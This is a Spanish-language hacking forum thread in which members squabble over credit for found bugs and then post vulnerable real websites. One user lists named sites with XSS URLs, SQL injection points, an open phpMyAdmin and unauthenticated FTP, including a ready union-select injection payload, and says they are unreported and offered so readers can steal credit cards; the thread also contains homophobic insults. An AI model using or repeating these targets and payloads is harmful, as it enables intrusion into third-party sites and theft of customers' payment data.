• Auditoria Web

  • Aquí se discutirán las principales técnicas usadas para auditar las aplicaciones web, técnicas como SQL Injection, XSS, CSRF, etc.
Aquí se discutirán las principales técnicas usadas para auditar las aplicaciones web, técnicas como SQL Injection, XSS, CSRF, etc.
 #272660  por [email protected]
 
Muchos bugs reportados fueron descubiertos por Navi_terrible y D4nb4r y aqui aparecen otros como que los descubrieron ellos... yo tambien soy parte de Safety last group y de Mandrake security.

mas detalles: http://www.camiloandresgarciacortes.com ... en-en.html

Mas detalles para quienes duden:
http://www.zone-h.org/archive/special=1 ... st%20Group

Ser sinceros no cuesta nada...
Saludos
 #272663  por Skillmax
 
[email protected] escribió:Muchos bugs reportados fueron descubiertos por Navi_terrible y D4nb4r y aqui aparecen otros como que los descubrieron ellos... yo tambien soy parte de Safety last group y de Mandrake security.

mas detalles: http://www.camiloandresgarciacortes.com ... en-en.html

Mas detalles para quienes duden:
http://www.zone-h.org/archive/special=1 ... st%20Group

Ser sinceros no cuesta nada...
Saludos

Poner los autores reales, no sean maricones, arriba mandrake, ahora ando muy ocupado y no tengo mucho contacto con danbar, pero ya hablaremos de próximas charlas junto a él.. ya tenemos alguna prevista pero falta confirmación por otro lado..
 #272672  por deck
 
Skillmax escribió:
[email protected] escribió:Muchos bugs reportados fueron descubiertos por Navi_terrible y D4nb4r y aqui aparecen otros como que los descubrieron ellos... yo tambien soy parte de Safety last group y de Mandrake security.

mas detalles: http://www.camiloandresgarciacortes.com ... en-en.html

Mas detalles para quienes duden:
http://www.zone-h.org/archive/special=1 ... st%20Group

Ser sinceros no cuesta nada...
Saludos

Poner los autores reales, no sean maricones, arriba mandrake, ahora ando muy ocupado y no tengo mucho contacto con danbar, pero ya hablaremos de próximas charlas junto a él.. ya tenemos alguna prevista pero falta confirmación por otro lado..
avisame skillgay q ya saves q toy dispuesto pa darle duro
 #272675  por k0ws
 
Muchos bugs reportados fueron descubiertos por Navi_terrible y D4nb4r y aqui aparecen otros como que los descubrieron ellos... yo tambien soy parte de Safety last group y de Mandrake security.

mas detalles: http://www.camiloandresgarciacortes.com ... en-en.html

Mas detalles para quienes duden:
http://www.zone-h.org/archive/special=1 ... st%20Group

Ser sinceros no cuesta nada...
Saludos
Eso va,por el post mio?

-Saludos-

PD:Si es asi,sorry ,no sabia que hubiese que poner el autor y tal.
 #272678  por [email protected]
 
tranquilos un abrazo para todos, si hace tiempo que formo parte de mandrake y safety, tengo una profunda amistad con navi y d4n.
espero tener la de ustedes tambien.
Pero eso si nombren a mis amigos
saludos
 #272781  por Metal_Kingdom
 
Avira OWNED!! pobres, no tienen suficiente con que les jodamos el antivirus
 #272783  por Solitario
 
puto avira, que ruina,
 #272786  por DD
 
Perdón, pero encontré XSS en rapidtrend..
BUG: http://rapidtrend.com/?q=%22%3E%3Cscrip ... /script%3E
....
Y si hacemos un DOM XSS?
 #273785  por DD
 
Perdón, pero encontré XSS en rapidtrend..
BUG: http://rapidtrend.com/?q=<!-- inyección -->&search=Search
Web: http://rapidtrend.com
Tipo: XSS
Descubridor: Endjureuk
Panel:
Sugerencias: Pueden robar cookies, o lanzarse a algo más divertido, ético y emocionante :)
 #273804  por DD
 
Aquí tienen un regalito, podrán comprar y robar tarjetas de crédito
-------------------------------------------------------------------------------------------------------
Web: http://www.downtowncrossing.org
Método: SQL injection
Bug: http://www.downtowncrossing.org/shop/shop.php?id=
Inyección recomendada: -1+union+select+1,2,3,group_concat(table_name)+from+information_schema.tables--
Comentarios: Sin reportar, sin defacear, justo para ustedes, porque a mi no me gusta hacer deface (No me gusta tanto, me gusta, pero no tanto)

-----------------------------------------------------------------------------------------------------------
Método: PhpMyAdmin no-password
Bug: http://www.mediumcube.com/demo/cpdemo/3 ... ex.php.htm
Comentarios:

--------------------------------------------------------------------------------------------------------------
Bug: http://www.at-factory.com/cgi-bin/
Método: FTP sin autenticar.
Comentarios:

---------------------------------------------------------------------------------------------------------------
Página: http://www.adobegallery.com
Método: SQLi
Bug: http://www.adobegallery.com/show.php?page=Show&showid=
Comentarios: Super owneo, sin avisar, sin defacear
----------------------------------------------------------------------------------------------------------------
Página: http://www.qutieland.com
Bug: http://www.qutieland.com/show.php?cat=1&scat1=1
Método: SQLi
Comentarios: ¿Cómo inyectarle? en cat=1 o en scat1=1, dónde quieras

Ya me cansé de reportar!!
Descubridor: Endjureuk
 #273927  por deck
 
Metal_Kingdom escribió:Avira OWNED!! pobres, no tienen suficiente con que les jodamos el antivirus
no es la de antivirus jajaj es la de una asoacion de vida jajaj
  • 1
  • 7
  • 8
  • 9
  • 10
  • 11
  • 14